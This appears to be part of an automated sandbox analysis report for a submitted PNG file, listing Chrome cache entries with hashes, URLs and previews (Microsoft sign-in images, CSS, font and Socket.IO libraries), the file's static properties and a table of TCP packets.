SHA1:	5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
SHA-256:	CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
SHA-512:	158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21

Chrome Cache Entry: 61

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
Category:	downloaded
Size (bytes):	276
Entropy (8bit):	7.316609873335077
Encrypted:	false
SSDEEP:	6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
MD5:	4E3510919D29D18EEB6E3E8B2687D2F5
SHA1:	31522A9EC576A462C3F1FFA65C010D4EB77E9A85
SHA-256:	1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
SHA-512:	DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
Malicious:	false
URL:	https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
Preview:	...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....e.......J).8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

Chrome Cache Entry: 62

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 63

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Chrome Cache Entry: 64

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
Category:	downloaded
Size (bytes):	199
Entropy (8bit):	6.766983163126765
Encrypted:	false
SSDEEP:	6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
MD5:	21B761F2B1FD37F587D7222023B09276
SHA1:	F7A416C8907424F9A9644753E3A93D4D63AE640E
SHA-256:	72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
SHA-512:	77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
Preview:	..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

Chrome Cache Entry: 65

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	23427
Entropy (8bit):	5.112735417225198
Encrypted:	false
SSDEEP:	384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
MD5:	BA0537E9574725096AF97C27D7E54F76
SHA1:	BD46B47D74D344F435B5805114559D45979762D5
SHA-256:	4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
SHA-512:	FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
Malicious:	false
URL:	https://www.w3schools.com/w3css/4/w3.css
Preview:	./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /.html{box-sizing:border-box},:before,:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p

Chrome Cache Entry: 66

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 154228, version 769.768
Category:	downloaded
Size (bytes):	154228
Entropy (8bit):	7.996770916751852
Encrypted:	true
SSDEEP:	3072:1s6054PmrMMxqMo/sE4yN1JWxUY+qI2kqdYt2B1dqchgjwQ:W68io3G5JYktDt62b
MD5:	55B416A8DF21F9F987AA352F10D1343B
SHA1:	2717F3F58271F2F2E6120D9937C7227002656D34
SHA-256:	D76FB4E841748A3F6BC63EFA23156E02631C283BF41F84EFCBDAF339EA3E1B73
SHA-512:	7C4983811EBA2AE80998C62C0EB48CC53EEC26E3CA4222D5CF0A758A5EA92E6A14DCFED4FE5B7EF5513F89BE2C0F336D0131687FA3EDDCBD4BB218BBD6BEB985
Malicious:	false
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2
Preview:	wOF2......Zt.......(..Z).........................8.$. .`..(...@..(.,..p. .....Hp......aD.f.O..q....@UUUU....l......G?../~.....O.................O......l...x}~.....=...N.'........Gu@..p1.G.....f,.*..V<[..W..U.W#......@....."[.D.8....L..7I......O.{v....E.bQY..B.P+F..)...?......<....e...4.X...H.`tA...@.@.v........GT.~!].....VV7..L.&.D..p.\G..~g.....^....ew.kT..3........pa.......W....A7..`.t/I;.3-K.vdK....D.m.ds.....A...b...#.?...G.O.m..=.....ux.:..gr.......3...v..t.{.p.x..@H..$.B#.H.....4rB.>..........'..8.......pj.<.h4..g..q,Y...Nb[.....ms.^L.0...]}....~.'....w?a>.9?.........H.O.fF#i4....L..;..4q...7a.m.m...R..3.\.v...b.....]B/Aex......lo.f..e .!.@X5....wb...q....=QL..R.._.............EE.W..._..Z.K...q.....2..........`..6..C...jj..#&A=@.>^..N.2.3....P.....t....Y.i..T..LN2..:x.V\..Z.7../1\|.x.V..~......=3.!...y...lz.O..<.dgCR4.A....8.p.aq...h.....6.>.e:...NQ.h....L.G2.V[.f...Ai.=+..+ ...'l..i.+C.t)s.(j...WZ_:..\9.Y..U.]......A.y..9........\xf.;.

Chrome Cache Entry: 67

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65317)
Category:	downloaded
Size (bytes):	100782
Entropy (8bit):	4.782445110770722
Encrypted:	false
SSDEEP:	1536:mUMVM6MVMkMVM9MVMNMVMispLudL+P8Wcn0Fwib3ePyUHsE+z:hudL25cn0FfePyUME+z
MD5:	6386FB409D4A2ABC96EEE7BE8F6D4CC4
SHA1:	09102CFC60EFB430A25EE97CEE9A6A35DF6DFC59
SHA-256:	0DF5A33710E433DE1F5415B1D47E4130CA7466AEE5B81955F1045C4844BBB3ED
SHA-512:	29F91FC180EC2E4225C10A7A2C59E5F3335D2C6C6EF58000D50BF020D92CE0F85C125412BEA73254B2C3F5A3215DDD77B908E85ED10A368B0E59A66A5E07A5D2
Malicious:	false
URL:	https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
Preview:	/!. Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em

Chrome Cache Entry: 68

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45667)
Category:	downloaded
Size (bytes):	45806
Entropy (8bit):	5.207605835316031
Encrypted:	false
SSDEEP:	384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
MD5:	80F5B8C6A9EEAC15DE93E5A112036A06
SHA1:	F7174635137D37581B11937FC90E9CB325077BCE
SHA-256:	0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
SHA-512:	B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
Malicious:	false
URL:	https://cdn.socket.io/4.6.0/socket.io.min.js
Preview:	/!. Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=

Chrome Cache Entry: 69

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 70

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	dropped
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 71

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	14
Entropy (8bit):	3.378783493486176
Encrypted:	false
SSDEEP:	3:MKRUeB:MKCeB
MD5:	D0FBDA9855D118740F1105334305C126
SHA1:	BC3023B36063A7681DB24681472B54FA11F0D4EC
SHA-256:	A469AB4CA4E55BF547566E9EBFA1B809C933207E9D558156BC0C4252B17533FE
SHA-512:	41171C08CA31B832C6E64C553702D38ADF805CE4FEC552B71659558A419C02589CF9332F40288FB450E6C52297EFA7903999F39DD48EFA20EDB92C7D8E3BD42B
Malicious:	false
URL:	https://cloudflare-ipfs.com/favicon.ico
Preview:	Page not found

Static File Info

General

File type:	PNG image data, 214 x 217, 8-bit/color RGBA, non-interlaced
Entropy (8bit):	7.9484317331978325
TrID:	Portable Network Graphics (16016/1) 100.00%
File name:	2024-04-16_11h42_39.png
File size:	20'824 bytes
MD5:	a900311b58ddd076cebb12bcf98b21e2
SHA1:	17e38bc13fb32228993320eea842797be742a8d4
SHA256:	5ccb7aa64e5dfa45703f73615f45b21f41cc34a7b71a419bb7b4cc1374117463
SHA512:	e7d5cc44e87904ac4fdd5ec7b93f7bbd369cc5d050e01cc138af4c847728ef33d2247baa4a53eff507fa39f13a53497d685e2de589b9d157e4d4fbca63bbe037
SSDEEP:	384:Y42UBSCEvA8Z8IBLoyouA+ifjNXSz+Uuh3erbStoV3hu4lIllmPVzE:3hlnRXufEh5uHS6VgblEPV4
TLSH:	A092D0872FBE55DB9850EA084EACB37F54AF0DA10129A9904EC53C514260ECFCD36D6A
File Content Preview:	.PNG........IHDR.............\.......sRGB.........gAMA......a.....pHYs..........o.d..P.IDATx^....-IU>p......P.E......<....3..%.&..#.0!"..(3F@.A1.YT.AF1..sN.?.^.;..j........;.k.o.9..v.._Wu...jq.[...B..-...B..-...B..-...B..-...B..-...B..-...B..-...B..-...

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 16, 2024 11:43:52.942786932 CEST	49674	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:43:52.942830086 CEST	49675	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:43:53.099025965 CEST	49672	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:43:57.755271912 CEST	49675	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:43:57.755285978 CEST	49674	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:43:57.850472927 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:57.850492954 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:57.850665092 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:57.851062059 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:57.851087093 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:57.905297041 CEST	49672	443	192.168.2.7	104.98.116.138
Apr 16, 2024 11:43:58.083360910 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.084810972 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.084820032 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.086711884 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.086783886 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.087615013 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.087697029 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.087768078 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.128132105 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.129420042 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.129452944 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.176122904 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.423346996 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.423501968 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.423568964 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.425405979 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.425432920 CEST	443	49700	104.18.20.78	192.168.2.7
Apr 16, 2024 11:43:58.425452948 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.425488949 CEST	49700	443	192.168.2.7	104.18.20.78
Apr 16, 2024 11:43:58.535077095 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:58.535113096 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:58.535227060 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:58.535375118 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:58.535392046 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:58.761996984 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:58.762425900 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:58.762442112 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:58.764071941 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:58.764164925 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:58.764959097 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:58.765047073 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:58.765239954 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:58.765249014 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:58.810868025 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:59.089720011 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 16, 2024 11:43:59.156210899 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:59.156284094 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:59.156320095 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:59.156392097 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:59.156414032 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:59.156431913 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:59.156517982 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:59.156619072 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:59.167866945 CEST	49703	443	192.168.2.7	104.17.96.13
Apr 16, 2024 11:43:59.167885065 CEST	443	49703	104.17.96.13	192.168.2.7
Apr 16, 2024 11:43:59.308865070 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.308897972 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.308978081 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.309161901 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.309166908 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.332004070 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.332057953 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.332180023 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.332262993 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.332285881 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.396903038 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 16, 2024 11:43:59.549381971 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.550235987 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.550261974 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.551131964 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.551224947 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.552870035 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.552938938 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.553663969 CEST	49705	443	192.168.2.7	104.21.2.93
Apr 16, 2024 11:43:59.553679943 CEST	443	49705	104.21.2.93	192.168.2.7
Apr 16, 2024 11:43:59.554630041 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.554841995 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.554862976 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.556535959 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.556602001 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.557449102 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.557450056 CEST	49704	443	192.168.2.7	3.162.103.56
Apr 16, 2024 11:43:59.557461977 CEST	443	49704	3.162.103.56	192.168.2.7
Apr 16, 2024 11:43:59.557539940 CEST	443	49704	3.162.103.56	192.168.2.7
